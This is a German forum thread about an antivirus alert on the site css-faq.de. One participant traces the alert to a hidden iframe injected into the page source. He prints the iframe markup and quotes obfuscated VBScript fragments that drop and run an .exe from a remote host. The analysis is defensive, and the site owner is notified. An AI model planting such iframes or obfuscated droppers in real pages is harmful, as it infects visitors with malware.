Antivirus schlägt Alarm bei www.css-faq.de
0 0 0 0 
Der Martin
0 0 4 0 0 0 
O'Brien
Antivirus schlägt Alarm bei www.css-faq.de
Hallo,
ich komme auf folgende Seite nicht mehr, mein Antivirus schlägt
Alarm. Könnt Ihr mir sagen warum?
Sunny
-
Hallo Sunny.
ich komme auf folgende Seite nicht mehr, mein Antivirus schlägt
Alarm. Könnt Ihr mir sagen warum?Weil du uns den genauen Wortlaut der Meldung verschweigst?
Einen schönen Samstag noch.
Gruß, Mathias
--
ie:% fl:| br:< va:) ls:& fo:) rl:( n4:~ ss:) de:] js:| mo:| zu:)
debian/rules-
Hallo
Weil du uns den genauen Wortlaut der Meldung verschweigst?
diese zwei
Trojan.Java.ClassLoader.ao
Exploit.HTML.IframeBofmeckert auch Kaspersky AV an beim Seitenaufruf.
Schöne Ostern ohne Trojaner weiterhin...
Helmut-
Hi,
diese zwei
Trojan.Java.ClassLoader.ao
Exploit.HTML.IframeBofmeckert auch Kaspersky AV an beim Seitenaufruf.
Ist es bedenklich, wenn mein Antivir nichts anmeckert?
mfG,
steckl-
Hallo,
Trojan.Java.ClassLoader.ao
Exploit.HTML.IframeBof
Ist es bedenklich, wenn mein Antivir nichts anmeckert?nein, nicht unbedingt.
Entweder er kennt diese Burschen noch nicht, das wäre dann in der Tat ein Grund, ihm nicht zu trauen.
Oder aber du hast deinen Browser so ordentlich konfiguriert, dass dein Antivir solches Gesocks erst gar nicht zu Gesicht bekommt.So long,
Martin--
F: Was ist wichtiger: Die Sonne oder der Mond?
A: Der Mond. Denn er scheint nachts. Die Sonne dagegen scheint tagsüber, wenn es sowieso hell ist.-
Hallo Martin.
Trojan.Java.ClassLoader.ao
Exploit.HTML.IframeBof
Ist es bedenklich, wenn mein Antivir nichts anmeckert?nein, nicht unbedingt.
Entweder er kennt diese Burschen noch nicht, das wäre dann in der Tat ein Grund, ihm nicht zu trauen.
Oder aber du hast deinen Browser so ordentlich konfiguriert, dass dein Antivir solches Gesocks erst gar nicht zu Gesicht bekommt.Die Site stammt von Jens Grochtdreis, welchen ich durchaus als vertrauenswürdig einstufen würde, ich halte diese Meldungen also eher für Fehlalarme.
Genaueres kann man wohl nur erfahren, wenn man die Softwareentwickler der Virenscanner bezüglich dieser Site kontaktiert.
Einen schönen Samstag noch.
Gruß, Mathias
--
ie:% fl:| br:< va:) ls:& fo:) rl:( n4:~ ss:) de:] js:| mo:| zu:)
debian/rules-
Hallo Mathias,
Die Site stammt von Jens Grochtdreis, welchen ich durchaus als vertrauenswürdig einstufen würde, ich halte diese Meldungen also eher für Fehlalarme.
Genaueres kann man wohl nur erfahren, wenn man die Softwareentwickler der Virenscanner bezüglich dieser Site kontaktiert.
Fehlalarm ist es wohl nicht, aber es kommt anscheinend auch nicht
direkt von der Seite, sondern von irgendwelchen Werbescripten
darin.Sunny
-
Hallo,
Die Site stammt von Jens Grochtdreis, welchen ich durchaus als vertrauenswürdig einstufen würde, ich halte diese Meldungen also eher für Fehlalarme.
Kennst Du Jens Grochtdreis näher?
Am Ende des Quelltextes von www.css-faq.de, nach dem schließenden html-Tag, steht folgendes:
<html>
<body>
<iframe width='2' height='2' border='0' frameborder='0' src='http://www.powersales.info/banners/index.php'></iframe>
</body>
</html>Die Seite www.powersales.info/banners/index.php generiert eine 404-Seite, welche allerdings versucht ein Cookie zu setzen. Wenn sie dieses Cookie noch nicht vorfindet, versucht sie per VBScript mit
CreateObject("Scrip"+"t"+"in"+"g"+"."+"F"+"ileS"+"y"+"s"+"temO"+"bject","")
...eine .exe-Datei im lokalen Dateisystem zu speichern und dann mit
CreateObject("WScrip"+"t.S"+"hell","")
...auszuführen.
Ist der cookie gesetzt, wird dieser Quellcodeabschnitt nicht mehr generiert, sondern es wird nur noch eine "not found"-Seite vorgespiegelt.
Der selbe IFRAME findet sich übrigens auch auf www.grochtdreis.de.
viele Grüße
Axel
-
Hallo Axel.
Die Site stammt von Jens Grochtdreis, welchen ich durchaus als vertrauenswürdig einstufen würde, ich halte diese Meldungen also eher für Fehlalarme.
Kennst Du Jens Grochtdreis näher?So nah wie man jemanden durch lesen seines Blogs kennen kann.
Die Seite www.powersales.info/banners/index.php generiert eine 404-Seite, welche allerdings versucht ein Cookie zu setzen. Wenn sie dieses Cookie noch nicht vorfindet, versucht sie per VBScript mit
[…]
Der selbe IFRAME findet sich übrigens auch auf www.grochtdreis.de.
Hast du ihn darauf aufmerksam gemacht? Wenn nicht, dann werde ich das tun.
Einen schönen Sonntag noch.
Gruß, Mathias
--
ie:% fl:| br:< va:) ls:& fo:) rl:( n4:~ ss:) de:] js:| mo:| zu:)
debian/rules-
Hallo,
Hast du ihn darauf aufmerksam gemacht? Wenn nicht, dann werde ich das tun.
Ja, ist bereits passiert... ...und der IFRAME ist auch bereits beseitigt.
viele Grüße
Axel
-
Hi,
Ja, ist bereits passiert... ...und der IFRAME ist auch bereits beseitigt.
wie kam er da hin?
Schönen Ostermontag noch!
O'Brien--
Frank und Buster: "Heya, wir sind hier um zu helfen!"-
Hi O'Brien,
wie kam er da hin?
Das würde ich auch gern wissen.
Viele Grüße
Mathias Bigge
-
-
-
-
-
-
-
-
-